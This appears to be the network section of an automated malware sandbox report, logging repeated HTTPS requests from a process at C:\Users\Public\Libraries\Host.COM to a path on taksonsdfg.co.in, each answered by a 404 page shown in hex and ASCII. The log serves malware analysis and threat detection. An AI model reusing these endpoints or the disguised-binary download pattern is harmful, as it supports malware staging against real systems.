                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    64192.168.2.450032108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:31 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:31 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:31 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:31 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:31 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    65192.168.2.450043108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:32 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:32 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:32 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:32 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:32 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    66192.168.2.450050108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:33 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:33 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:33 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:33 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:33 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    67192.168.2.450062108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:34 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:35 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:34 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:35 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:35 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    68192.168.2.450069108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:35 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:36 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:36 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:36 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:36 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    69192.168.2.450080108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:37 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:37 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:37 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:37 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:37 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    70192.168.2.450088108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:38 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:38 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:38 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:38 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:38 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    71192.168.2.450096108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:39 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:39 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:39 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
